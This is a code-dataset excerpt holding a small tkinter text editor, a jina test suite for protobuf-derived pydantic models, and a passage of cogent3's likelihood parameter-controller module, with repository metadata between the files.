self.file_menu.add_command(label='Save as...', accelerator='Ctrl+Shift+S', command=self.save_file_as)
self.file_menu.add_separator()
self.file_menu.add_command(label='Quit', accelerator='Ctrl+Q', command=self.quit)
self.menu_bar.add_cascade(label='File', menu=self.file_menu)
self.menu_bar.add_command(label='About', command=TextEditor.show_about)
self.config(menu=self.menu_bar)
self.bind('<Control-n>', lambda e: self.new_file())
self.bind('<Control-N>', lambda e: self.new_file())
self.bind('<Control-o>', lambda e: self.open_file())
self.bind('<Control-O>', lambda e: self.open_file())
self.bind('<Control-s>', lambda e: self.save_file())
self.bind('<Control-S>', lambda e: self.save_file())
self.bind('<Control-Shift-s>', lambda e: self.save_file_as())
self.bind('<Control-Shift-S>', lambda e: self.save_file_as())
self.bind('<Control-q>', lambda e: self.quit())
self.bind('<Control-Q>', lambda e: self.quit())
self.filename = None
def new_file(self):
self.filename = None
self.text_field.delete('1.0', 'end')
def open_file(self):
self.filename = fd.askopenfilename()
if self.filename and os.path.isfile(self.filename):
with open(self.filename, 'r') as f:
self.text_field.delete('1.0', 'end')
self.text_field.insert('end', f.read())
def save_file(self):
if self.filename and os.path.isfile(self.filename):
with open(self.filename, 'w') as f:
f.write(self.text_field.get('1.0', 'end'))
else:
self.save_file_as()
def save_file_as(self):
self.filename = fd.asksaveasfilename()
if self.filename:
with open(self.filename, 'w') as f:
f.write(self.text_field.get('1.0', 'end'))
@staticmethod
def show_about():
mb.showinfo(
'About',
'Ugly Text Editor v1.0\nDeveloped by Kirill Volozhanin\ngithub.com/JustKappaMan',
)
if __name__ == '__main__':
main()
| 34.916667
| 109
| 0.627685
|
import os.path
import tkinter as tk
import tkinter.filedialog as fd
import tkinter.messagebox as mb
def main():
text_editor = TextEditor()
text_editor.mainloop()
class TextEditor(tk.Tk):
def __init__(self):
super(TextEditor, self).__init__()
self.title('Ugly Text Editor')
self.option_add('*Dialog.msg.font', 'Arial 12')
self.minsize(640, 360)
self.maxsize(self.winfo_screenwidth(), self.winfo_screenheight())
self.scrollbar = tk.Scrollbar(self)
self.scrollbar.pack(fill='y', side='right')
self.text_field = tk.Text(self, bd=0, highlightthickness=0, yscrollcommand=self.scrollbar.set)
self.text_field.pack(fill='both', expand=True)
self.scrollbar.config(command=self.text_field.yview)
self.menu_bar = tk.Menu(self)
self.file_menu = tk.Menu(self.menu_bar, tearoff=0)
self.file_menu.add_command(label='New', accelerator='Ctrl+N', command=self.new_file)
self.file_menu.add_command(label='Open...', accelerator='Ctrl+O', command=self.open_file)
self.file_menu.add_separator()
self.file_menu.add_command(label='Save', accelerator='Ctrl+S', command=self.save_file)
self.file_menu.add_command(label='Save as...', accelerator='Ctrl+Shift+S', command=self.save_file_as)
self.file_menu.add_separator()
self.file_menu.add_command(label='Quit', accelerator='Ctrl+Q', command=self.quit)
self.menu_bar.add_cascade(label='File', menu=self.file_menu)
self.menu_bar.add_command(label='About', command=TextEditor.show_about)
self.config(menu=self.menu_bar)
self.bind('<Control-n>', lambda e: self.new_file())
self.bind('<Control-N>', lambda e: self.new_file())
self.bind('<Control-o>', lambda e: self.open_file())
self.bind('<Control-O>', lambda e: self.open_file())
self.bind('<Control-s>', lambda e: self.save_file())
self.bind('<Control-S>', lambda e: self.save_file())
self.bind('<Control-Shift-s>', lambda e: self.save_file_as())
self.bind('<Control-Shift-S>', lambda e: self.save_file_as())
self.bind('<Control-q>', lambda e: self.quit())
self.bind('<Control-Q>', lambda e: self.quit())
self.filename = None
def new_file(self):
self.filename = None
self.text_field.delete('1.0', 'end')
def open_file(self):
self.filename = fd.askopenfilename()
if self.filename and os.path.isfile(self.filename):
with open(self.filename, 'r') as f:
self.text_field.delete('1.0', 'end')
self.text_field.insert('end', f.read())
def save_file(self):
if self.filename and os.path.isfile(self.filename):
with open(self.filename, 'w') as f:
f.write(self.text_field.get('1.0', 'end'))
else:
self.save_file_as()
def save_file_as(self):
self.filename = fd.asksaveasfilename()
if self.filename:
with open(self.filename, 'w') as f:
f.write(self.text_field.get('1.0', 'end'))
@staticmethod
def show_about():
mb.showinfo(
'About',
'Ugly Text Editor v1.0\nDeveloped by Kirill Volozhanin\ngithub.com/JustKappaMan',
)
if __name__ == '__main__':
main()
| true
| true
|
f707c1f72b166d564102c71fd7bea8a334d81170
| 10,269
|
py
|
Python
|
tests/unit/peapods/runtimes/gateway/http/test_models.py
|
Akshat-unt/jina
|
b0b058f99f3ee4dcbcbbf2acbf04c5d7e7e9c717
|
[
"Apache-2.0"
] | 1
|
2021-12-18T06:54:49.000Z
|
2021-12-18T06:54:49.000Z
|
tests/unit/peapods/runtimes/gateway/http/test_models.py
|
Akshat-unt/jina
|
b0b058f99f3ee4dcbcbbf2acbf04c5d7e7e9c717
|
[
"Apache-2.0"
] | 2
|
2021-12-17T15:22:12.000Z
|
2021-12-18T07:19:06.000Z
|
tests/unit/peapods/runtimes/gateway/http/test_models.py
|
Akshat-unt/jina
|
b0b058f99f3ee4dcbcbbf2acbf04c5d7e7e9c717
|
[
"Apache-2.0"
] | null | null | null |
import pydantic
import pytest
from jina.peapods.runtimes.gateway.http.models import (
PROTO_TO_PYDANTIC_MODELS,
JinaRequestModel,
)
from jina.types.document import Document
from tests import random_docs
def test_schema_invocation():
for v in vars(PROTO_TO_PYDANTIC_MODELS).values():
v.schema()
v.schema_json()
def test_existing_definitions():
"""This tests: all internal schema definitions are part of parent"""
for i in [
'QuantizationMode',
'DenseNdArrayProto',
'SparseNdArrayProto',
'NdArrayProto',
'NamedScoreProto',
'DocumentProto',
]:
assert (
i in PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'].keys()
)
def test_enum_definitions():
"""This tests: all enums are defined properly as different levels"""
quantization_enum_definition = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()[
'definitions'
]['QuantizationMode']
assert quantization_enum_definition['enum'] == [0, 1, 2, 3]
status_code_enum_definition = PROTO_TO_PYDANTIC_MODELS.StatusProto().schema()[
'definitions'
]['StatusCode']
assert status_code_enum_definition['enum'] == [0, 1, 2, 3, 4, 5, 6]
command_enum_definition = PROTO_TO_PYDANTIC_MODELS.RequestProto().schema()[
'definitions'
]['Command']
assert command_enum_definition['enum'] == [0, 1, 2, 3, 4, 5, 6]
def test_all_fields_in_document_proto():
"""This tests: all fields are picked from the proto definition"""
document_proto_properties = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema(
by_alias=False
)['definitions']['DocumentProto']['properties']
for i in [
'id',
'granularity',
'adjacency',
'parent_id',
'chunks',
'weight',
'matches',
'mime_type',
'uri',
'tags',
'location',
'offset',
'embedding',
'scores',
'modality',
'evaluations',
]:
assert i in document_proto_properties
document_proto_properties_alias = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()[
'definitions'
]['DocumentProto']['properties']
for i in ['parentId', 'mimeType']:
assert i in document_proto_properties_alias
def test_oneof_text():
"""This tests: oneof field is correctly represented as `anyOf`"""
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(text='abc')
assert doc.text == 'abc'
assert 'blob' not in doc.dict()
assert 'buffer' not in doc.dict()
def test_oneof_buffer():
"""This tests: oneof field is correctly represented as `anyOf`"""
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(buffer=b'abc')
assert doc.buffer == b'abc'
assert 'text' not in doc.dict()
assert 'blob' not in doc.dict()
def test_oneof_blob():
"""This tests: oneof field is correctly represented as `anyOf`"""
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
blob=PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
)
assert doc.blob == PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
assert 'text' not in doc.dict()
assert 'buffer' not in doc.dict()
def test_oneof_validation_error():
"""This tests validation error for invalid fields"""
with pytest.raises(pydantic.error_wrappers.ValidationError) as error:
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(text='abc', buffer=b'abc')
assert "only one field among ['buffer', 'blob', 'text', 'graph']" in str(
error.value
)
with pytest.raises(pydantic.error_wrappers.ValidationError) as error:
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
text='abc', buffer=b'abc', blob=PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
)
assert "only one field among ['buffer', 'blob', 'text', 'graph']" in str(
error.value
)
def test_tags_document():
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world')
assert doc.tags == {'hello': 'world'}
assert Document(doc.dict()).tags == {'hello': 'world'}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world', tags={'key': 'value'})
assert doc.tags == {'hello': 'world', 'key': 'value'}
assert Document(doc.dict()).tags == {
'hello': 'world',
'key': 'value',
}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
hello='world', tags={'key': {'nested': 'value'}}
)
assert doc.tags == {'hello': 'world', 'key': {'nested': 'value'}}
assert Document(doc.dict()).tags == {
'hello': 'world',
'key': {'nested': 'value'},
}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world', tags={'key': [1, 2, 3]})
# TODO: Issue about having proper ListValueView, not really expected
assert doc.tags != {'key': [1, 2, 3]}
with pytest.raises(TypeError):
assert Document(doc.dict()).tags != {{'key': [1, 2, 3]}}
def test_repeated():
"""This tests: repeated fields are represented as `array`"""
assert (
PROTO_TO_PYDANTIC_MODELS.DenseNdArrayProto().schema()['properties']['shape'][
'type'
]
== 'array'
)
assert (
PROTO_TO_PYDANTIC_MODELS.NamedScoreProto().schema()['definitions'][
'NamedScoreProto'
]['properties']['operands']['type']
== 'array'
)
assert (
PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'][
'DocumentProto'
]['properties']['chunks']['type']
== 'array'
)
def test_recursive_schema():
"""This tests: recursive schmea definions are represented properly"""
assert PROTO_TO_PYDANTIC_MODELS.NamedScoreProto().schema()['definitions'][
'NamedScoreProto'
]['properties']['operands']['items'] == {'$ref': '#/definitions/NamedScoreProto'}
def test_struct():
"""This tests: google.protobuf.Struct are represented as `object`"""
assert (
PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'][
'DocumentProto'
]['properties']['tags']['type']
== 'object'
)
def test_timestamp():
"""This tests: google.protobuf.Timestamp are represented as date-time"""
assert (
PROTO_TO_PYDANTIC_MODELS.RouteProto().schema(by_alias=False)['properties'][
'start_time'
]['type']
== 'string'
)
assert (
PROTO_TO_PYDANTIC_MODELS.RouteProto().schema(by_alias=False)['properties'][
'start_time'
]['format']
== 'date-time'
)
def test_jina_document_to_pydantic_document():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
for jina_doc in random_docs(num_docs=10):
jina_doc = jina_doc.dict()
pydantic_doc = document_proto_model(**jina_doc)
assert jina_doc['text'] == pydantic_doc.text
assert jina_doc['mime_type'] == pydantic_doc.mime_type
assert (
jina_doc['embedding']['dense']['shape']
== pydantic_doc.embedding.dense.shape
)
assert (
jina_doc['embedding']['dense']['dtype']
== pydantic_doc.embedding.dense.dtype
)
for jina_doc_chunk, pydantic_doc_chunk in zip(
jina_doc['chunks'], pydantic_doc.chunks
):
assert jina_doc_chunk['id'] == pydantic_doc_chunk.id
assert jina_doc_chunk['tags'] == pydantic_doc_chunk.tags
assert jina_doc_chunk['text'] == pydantic_doc_chunk.text
assert jina_doc_chunk['mime_type'] == pydantic_doc_chunk.mime_type
assert jina_doc_chunk['parent_id'] == pydantic_doc_chunk.parent_id
assert jina_doc_chunk['granularity'] == pydantic_doc_chunk.granularity
def test_jina_document_to_pydantic_document_sparse():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
for jina_doc in random_docs(num_docs=10, sparse_embedding=True):
jina_doc = jina_doc.dict()
pydantic_doc = document_proto_model(**jina_doc)
assert jina_doc['text'] == pydantic_doc.text
assert jina_doc['mime_type'] == pydantic_doc.mime_type
assert (
jina_doc['embedding']['sparse']['indices']['buffer']
== pydantic_doc.embedding.sparse.indices.buffer.decode()
)
assert (
jina_doc['embedding']['sparse']['indices']['shape']
== pydantic_doc.embedding.sparse.indices.shape
)
assert (
jina_doc['embedding']['sparse']['indices']['dtype']
== pydantic_doc.embedding.sparse.indices.dtype
)
assert (
jina_doc['embedding']['sparse']['values']['buffer']
== pydantic_doc.embedding.sparse.values.buffer.decode()
)
assert (
jina_doc['embedding']['sparse']['values']['shape']
== pydantic_doc.embedding.sparse.values.shape
)
assert (
jina_doc['embedding']['sparse']['values']['dtype']
== pydantic_doc.embedding.sparse.values.dtype
)
for jina_doc_chunk, pydantic_doc_chunk in zip(
jina_doc['chunks'], pydantic_doc.chunks
):
assert jina_doc_chunk['id'] == pydantic_doc_chunk.id
assert jina_doc_chunk['tags'] == pydantic_doc_chunk.tags
assert jina_doc_chunk['text'] == pydantic_doc_chunk.text
assert jina_doc_chunk['mime_type'] == pydantic_doc_chunk.mime_type
assert jina_doc_chunk['parent_id'] == pydantic_doc_chunk.parent_id
assert jina_doc_chunk['granularity'] == pydantic_doc_chunk.granularity
def test_pydatic_document_to_jina_document():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
jina_doc = Document(document_proto_model(text='abc').json())
assert jina_doc.text == 'abc'
assert jina_doc.content == 'abc'
jina_doc = Document(document_proto_model(text='abc').dict())
assert jina_doc.text == 'abc'
assert jina_doc.content == 'abc'
@pytest.mark.parametrize('top_k', [5, 10])
def test_model_with_top_k(top_k):
m = JinaRequestModel(data=['abc'], parameters={'top_k': top_k})
assert m.parameters['top_k'] == top_k
m = JinaRequestModel(parameters={'top_k': top_k})
assert m.parameters['top_k'] == top_k
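# A hedged usage sketch: the generated pydantic models expose the standard
# pydantic schema helpers (exercised by test_schema_invocation above), which
# is what the HTTP gateway relies on for its OpenAPI docs. Dumping one schema
# needs nothing beyond the existing imports:
if __name__ == '__main__':
    print(PROTO_TO_PYDANTIC_MODELS.DocumentProto.schema_json(indent=2))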
| 33.558824
| 88
| 0.637258
|
import pydantic
import pytest
from jina.peapods.runtimes.gateway.http.models import (
PROTO_TO_PYDANTIC_MODELS,
JinaRequestModel,
)
from jina.types.document import Document
from tests import random_docs
def test_schema_invocation():
for v in vars(PROTO_TO_PYDANTIC_MODELS).values():
v.schema()
v.schema_json()
def test_existing_definitions():
for i in [
'QuantizationMode',
'DenseNdArrayProto',
'SparseNdArrayProto',
'NdArrayProto',
'NamedScoreProto',
'DocumentProto',
]:
assert (
i in PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'].keys()
)
def test_enum_definitions():
quantization_enum_definition = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()[
'definitions'
]['QuantizationMode']
assert quantization_enum_definition['enum'] == [0, 1, 2, 3]
status_code_enum_definition = PROTO_TO_PYDANTIC_MODELS.StatusProto().schema()[
'definitions'
]['StatusCode']
assert status_code_enum_definition['enum'] == [0, 1, 2, 3, 4, 5, 6]
command_enum_definition = PROTO_TO_PYDANTIC_MODELS.RequestProto().schema()[
'definitions'
]['Command']
assert command_enum_definition['enum'] == [0, 1, 2, 3, 4, 5, 6]
def test_all_fields_in_document_proto():
document_proto_properties = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema(
by_alias=False
)['definitions']['DocumentProto']['properties']
for i in [
'id',
'granularity',
'adjacency',
'parent_id',
'chunks',
'weight',
'matches',
'mime_type',
'uri',
'tags',
'location',
'offset',
'embedding',
'scores',
'modality',
'evaluations',
]:
assert i in document_proto_properties
document_proto_properties_alias = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()[
'definitions'
]['DocumentProto']['properties']
for i in ['parentId', 'mimeType']:
assert i in document_proto_properties_alias
def test_oneof_text():
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(text='abc')
assert doc.text == 'abc'
assert 'blob' not in doc.dict()
assert 'buffer' not in doc.dict()
def test_oneof_buffer():
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(buffer=b'abc')
assert doc.buffer == b'abc'
assert 'text' not in doc.dict()
assert 'blob' not in doc.dict()
def test_oneof_blob():
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
blob=PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
)
assert doc.blob == PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
assert 'text' not in doc.dict()
assert 'buffer' not in doc.dict()
def test_oneof_validation_error():
with pytest.raises(pydantic.error_wrappers.ValidationError) as error:
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(text='abc', buffer=b'abc')
assert "only one field among ['buffer', 'blob', 'text', 'graph']" in str(
error.value
)
with pytest.raises(pydantic.error_wrappers.ValidationError) as error:
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
text='abc', buffer=b'abc', blob=PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
)
assert "only one field among ['buffer', 'blob', 'text', 'graph']" in str(
error.value
)
def test_tags_document():
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world')
assert doc.tags == {'hello': 'world'}
assert Document(doc.dict()).tags == {'hello': 'world'}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world', tags={'key': 'value'})
assert doc.tags == {'hello': 'world', 'key': 'value'}
assert Document(doc.dict()).tags == {
'hello': 'world',
'key': 'value',
}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
hello='world', tags={'key': {'nested': 'value'}}
)
assert doc.tags == {'hello': 'world', 'key': {'nested': 'value'}}
assert Document(doc.dict()).tags == {
'hello': 'world',
'key': {'nested': 'value'},
}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world', tags={'key': [1, 2, 3]})
assert doc.tags != {'key': [1, 2, 3]}
with pytest.raises(TypeError):
assert Document(doc.dict()).tags != {{'key': [1, 2, 3]}}
def test_repeated():
assert (
PROTO_TO_PYDANTIC_MODELS.DenseNdArrayProto().schema()['properties']['shape'][
'type'
]
== 'array'
)
assert (
PROTO_TO_PYDANTIC_MODELS.NamedScoreProto().schema()['definitions'][
'NamedScoreProto'
]['properties']['operands']['type']
== 'array'
)
assert (
PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'][
'DocumentProto'
]['properties']['chunks']['type']
== 'array'
)
def test_recursive_schema():
assert PROTO_TO_PYDANTIC_MODELS.NamedScoreProto().schema()['definitions'][
'NamedScoreProto'
]['properties']['operands']['items'] == {'$ref': '#/definitions/NamedScoreProto'}
def test_struct():
assert (
PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'][
'DocumentProto'
]['properties']['tags']['type']
== 'object'
)
def test_timestamp():
assert (
PROTO_TO_PYDANTIC_MODELS.RouteProto().schema(by_alias=False)['properties'][
'start_time'
]['type']
== 'string'
)
assert (
PROTO_TO_PYDANTIC_MODELS.RouteProto().schema(by_alias=False)['properties'][
'start_time'
]['format']
== 'date-time'
)
def test_jina_document_to_pydantic_document():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
for jina_doc in random_docs(num_docs=10):
jina_doc = jina_doc.dict()
pydantic_doc = document_proto_model(**jina_doc)
assert jina_doc['text'] == pydantic_doc.text
assert jina_doc['mime_type'] == pydantic_doc.mime_type
assert (
jina_doc['embedding']['dense']['shape']
== pydantic_doc.embedding.dense.shape
)
assert (
jina_doc['embedding']['dense']['dtype']
== pydantic_doc.embedding.dense.dtype
)
for jina_doc_chunk, pydantic_doc_chunk in zip(
jina_doc['chunks'], pydantic_doc.chunks
):
assert jina_doc_chunk['id'] == pydantic_doc_chunk.id
assert jina_doc_chunk['tags'] == pydantic_doc_chunk.tags
assert jina_doc_chunk['text'] == pydantic_doc_chunk.text
assert jina_doc_chunk['mime_type'] == pydantic_doc_chunk.mime_type
assert jina_doc_chunk['parent_id'] == pydantic_doc_chunk.parent_id
assert jina_doc_chunk['granularity'] == pydantic_doc_chunk.granularity
def test_jina_document_to_pydantic_document_sparse():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
for jina_doc in random_docs(num_docs=10, sparse_embedding=True):
jina_doc = jina_doc.dict()
pydantic_doc = document_proto_model(**jina_doc)
assert jina_doc['text'] == pydantic_doc.text
assert jina_doc['mime_type'] == pydantic_doc.mime_type
assert (
jina_doc['embedding']['sparse']['indices']['buffer']
== pydantic_doc.embedding.sparse.indices.buffer.decode()
)
assert (
jina_doc['embedding']['sparse']['indices']['shape']
== pydantic_doc.embedding.sparse.indices.shape
)
assert (
jina_doc['embedding']['sparse']['indices']['dtype']
== pydantic_doc.embedding.sparse.indices.dtype
)
assert (
jina_doc['embedding']['sparse']['values']['buffer']
== pydantic_doc.embedding.sparse.values.buffer.decode()
)
assert (
jina_doc['embedding']['sparse']['values']['shape']
== pydantic_doc.embedding.sparse.values.shape
)
assert (
jina_doc['embedding']['sparse']['values']['dtype']
== pydantic_doc.embedding.sparse.values.dtype
)
for jina_doc_chunk, pydantic_doc_chunk in zip(
jina_doc['chunks'], pydantic_doc.chunks
):
assert jina_doc_chunk['id'] == pydantic_doc_chunk.id
assert jina_doc_chunk['tags'] == pydantic_doc_chunk.tags
assert jina_doc_chunk['text'] == pydantic_doc_chunk.text
assert jina_doc_chunk['mime_type'] == pydantic_doc_chunk.mime_type
assert jina_doc_chunk['parent_id'] == pydantic_doc_chunk.parent_id
assert jina_doc_chunk['granularity'] == pydantic_doc_chunk.granularity
def test_pydatic_document_to_jina_document():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
jina_doc = Document(document_proto_model(text='abc').json())
assert jina_doc.text == 'abc'
assert jina_doc.content == 'abc'
jina_doc = Document(document_proto_model(text='abc').dict())
assert jina_doc.text == 'abc'
assert jina_doc.content == 'abc'
@pytest.mark.parametrize('top_k', [5, 10])
def test_model_with_top_k(top_k):
m = JinaRequestModel(data=['abc'], parameters={'top_k': top_k})
assert m.parameters['top_k'] == top_k
m = JinaRequestModel(parameters={'top_k': top_k})
assert m.parameters['top_k'] == top_k
| true
| true
|
f707c234f80c2a7b484c963a5e239100d01184f1
| 20,460
|
py
|
Python
|
src/cogent3/evolve/parameter_controller.py
|
rahulghangas/cogent3
|
f00cf822efce5f3141b3c7dafac81cb94a311e22
|
[
"BSD-3-Clause"
] | null | null | null |
src/cogent3/evolve/parameter_controller.py
|
rahulghangas/cogent3
|
f00cf822efce5f3141b3c7dafac81cb94a311e22
|
[
"BSD-3-Clause"
] | null | null | null |
src/cogent3/evolve/parameter_controller.py
|
rahulghangas/cogent3
|
f00cf822efce5f3141b3c7dafac81cb94a311e22
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
"""
This file defines a class for controlling the scope and heterogeneity of
parameters involved in a maximum-likelihood based tree analysis.
"""
import pickle
import warnings
import numpy
from cogent3.align import dp_calculation
from cogent3.align.pairwise import AlignableSeq
from cogent3.core.tree import TreeError
from cogent3.evolve import likelihood_calculation
from cogent3.evolve.likelihood_function import LikelihoodFunction as _LF
from cogent3.maths.stats.information_criteria import aic, bic
from cogent3.recalculation.scope import _indexed
from cogent3.util.misc import adjusted_gt_minprob
from cogent3.util.warning import deprecated, discontinued
__author__ = "Peter Maxwell"
__copyright__ = "Copyright 2007-2019, The Cogent Project"
__credits__ = ["Andrew Butterfield", "Peter Maxwell", "Gavin Huttley", "Helen Lindsay"]
__license__ = "BSD-3"
__version__ = "2019.9.13a"
__maintainer__ = "Gavin Huttley"
__email__ = "gavin.huttley@anu.ed.au"
__status__ = "Production"
def _category_names(dimension, specified):
if type(specified) is int:
cats = ["%s%s" % (dimension, i) for i in range(specified)]
else:
cats = tuple(specified)
assert len(cats) >= 1, cats
assert len(set(cats)) == len(cats), "%s names must be unique" % dimension
return list(cats)
def load(filename):
# first cut at saving pc's
f = open(filename, "rb")
(version, info, pc) = pickle.load(f)
assert version < 2.0, version
pc.update_intermediate_values()
return pc
class _LikelihoodParameterController(_LF):
"""A ParameterController works by setting parameter rules. For each
    parameter in the model, the edges of the tree are partitioned into groups
that share one value.
For usage see the set_param_rule method.
"""
    # Basically a wrapper around the more generic recalculation.ParameterController
# class, which doesn't know about trees.
def __init__(
self,
model,
tree,
bins=1,
loci=1,
optimise_motif_probs=False,
motif_probs_from_align=False,
**kw,
):
# cache of arguments used to construct
self._serialisable = locals()
for key in ("self", "__class__", "kw"):
self._serialisable.pop(key)
self._serialisable.update(kw)
self.model = self._model = model
self.tree = self._tree = tree
self.seq_names = tree.get_tip_names()
self.locus_names = _category_names("locus", loci)
self.bin_names = _category_names("bin", bins)
self.posn_names = [str(i) for i in range(model.word_length)]
self.motifs = self._motifs = model.get_motifs()
self._mprob_motifs = list(model.get_mprob_alphabet())
defn = self.make_likelihood_defn(**kw)
super(_LF, self).__init__(defn)
self.set_default_param_rules()
self.set_default_tree_parameter_rules()
self.mprobs_from_alignment = motif_probs_from_align
self.optimise_motif_probs = optimise_motif_probs
self._name = ""
self._format = {}
def save(self, filename):
with open(filename, "w") as f:
temp = {}
try:
for d in self.defns:
temp[id(d)] = d.values
del d.values
pickle.dump((1.0, None, self), f)
finally:
for d in self.defns:
if id(d) in temp:
d.values = temp[id(d)]
def set_default_tree_parameter_rules(self):
"""Lengths are set to the values found in the tree (if any), and
free to be optimised independently.
Other parameters are scoped based on the unique values found in the
tree (if any) or default to having one value shared across the whole
tree"""
with self.updates_postponed():
edges = self.tree.get_edge_vector()
for par_name in self.model.get_param_list():
try:
values = dict(
[
(edge.name, edge.params[par_name])
for edge in edges
if not edge.isroot()
]
)
(uniq, index) = _indexed(values)
except KeyError:
continue # new parameter
for (u, value) in enumerate(uniq):
group = [edge for (edge, i) in list(index.items()) if i == u]
self.set_param_rule(par_name, edges=group, init=value)
for edge in edges:
if edge.length is not None:
try:
self.set_param_rule("length", edge=edge.name, init=edge.length)
except KeyError:
# hopefully due to being a discrete model
warnings.warn("Ignoring tree edge lengths", stacklevel=4)
break
def set_motif_probs_from_data(
self,
align,
locus=None,
is_constant=None,
include_ambiguity=False,
is_independent=None,
auto=False,
pseudocount=None,
**kwargs,
):
counts = self.model.count_motifs(align, include_ambiguity=include_ambiguity)
if is_constant is None:
is_constant = not self.optimise_motif_probs
if pseudocount is None:
if is_constant:
pseudocount = 0.0
else:
pseudocount = 0.5
counts += pseudocount
mprobs = counts / (1.0 * sum(counts))
self.set_motif_probs(
mprobs,
locus=locus,
is_constant=is_constant,
is_independent=is_independent,
auto=auto,
**kwargs,
)
def set_motif_probs(
self,
motif_probs,
locus=None,
bin=None,
is_constant=None,
is_independent=None,
auto=False,
**kwargs,
):
motif_probs = self.model.adapt_motif_probs(motif_probs, auto=auto)
motif_probs = adjusted_gt_minprob(motif_probs, minprob=1e-6)
if is_constant is None:
is_constant = not self.optimise_motif_probs
self.model.set_param_controller_motif_probs(
self,
motif_probs,
is_constant=is_constant,
bin=bin,
locus=locus,
is_independent=is_independent,
**kwargs,
)
if not auto:
self.mprobs_from_alignment = False # should be done per-locus
def set_expm(self, expm):
assert expm in ["pade", "either", "eigen", "checked"], expm
self.set_param_rule("expm", is_constant=True, value=expm)
def make_calculator(self, **kw):
return super(_LF, self).make_calculator(**kw)
def _process_scope_info(
self,
edge=None,
tip_names=None,
edges=None,
clade=None,
stem=None,
outgroup_name=None,
):
"""From information specifying the scope of a parameter derive a list of
edge names"""
if edges is not None:
if tip_names or edge:
raise TreeError("Only ONE of edge, edges or tip_names")
elif edge is not None:
if tip_names:
raise TreeError("Only ONE of edge, edges or tip_names")
edges = [edge]
elif tip_names is None:
edges = None # meaning all edges
elif len(tip_names) != 2:
raise TreeError("tip_names must contain 2 species")
else:
(species1, species2) = tip_names
if stem is None:
stem = False
if clade is None:
clade = not stem
edges = self.tree.get_edge_names(
species1, species2, stem=stem, clade=clade, outgroup_name=outgroup_name
)
return edges
def apply_param_rules(self, rules):
"""batch applies a collection of param rules"""
with self.updates_postponed():
for rule in rules:
self.set_param_rule(**rule)
def set_time_heterogeneity(
self,
exclude_params=None,
edge_sets=None,
is_independent=None,
is_constant=False,
value=None,
lower=None,
init=None,
upper=None,
):
"""modifes the scope of all submodel rate, aside from excluded params,
by constructing a list of parameter rules and using the
apply_param_rules method
Parameters
----------
exclude_params
name(s) of substitution model predicate(s) to be excluded
edge_sets
series of dicts with an 'edges' key. Can also specify
            is_independent, is_constant etc. If those are not provided, the
method argument values are applied
is_independent : bool
whether edges in all edge sets are to be considered independent.
            Defaults to False. Overridden by edge_sets values.
is_constant : bool
makes constant all rate term parameters for all edge sets.
Overridden by edge_sets values.
value
value for constant parameters, only valid when is_constant.
Overridden by edge_sets values.
lower, init, upper
lower bound, starting value, upper bound for all parameters for
all edge sets. Only valid if not is_constant.
Overridden by edge_sets values.
"""
if is_constant and any([lower, init, upper]):
raise ValueError("cannot specify bounds or init for a constant param")
if is_constant:
kwargs = dict(is_constant=True, value=value)
else:
kwargs = dict(
is_independent=is_independent, init=init, lower=lower, upper=upper
)
rate_terms = self._model.get_param_list()
exclude_params = exclude_params or []
if exclude_params and type(exclude_params) == str:
exclude_params = [exclude_params]
for param in exclude_params:
if param not in rate_terms:
raise ValueError(f"'{param}' not a valid rate param")
rate_terms.remove(param)
if edge_sets is None:
# this just makes the following algorithm consistent
edge_sets = [
dict(edges=[n]) for n in self.tree.get_node_names(includeself=False)
]
elif type(edge_sets) == dict:
edge_sets = [edge_sets]
# we make param rules
param_rules = []
for edge_set in edge_sets:
edges = edge_set.get("edges", None)
if type(edges) == str:
edges = [edges]
if edges:
edges = list(edges)
edge_set["edges"] = edges
rule_base = kwargs.copy()
rule_base.update(edge_set)
for param in rate_terms:
rule = rule_base.copy()
rule.update(dict(par_name=param))
param_rules.append(rule)
self.apply_param_rules(param_rules)
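    # A hedged illustration of edge_sets (the edge names are assumptions):
    # giving two neighbouring edges their own independent rate terms while
    # the rest of the tree keeps the method-level defaults would look like
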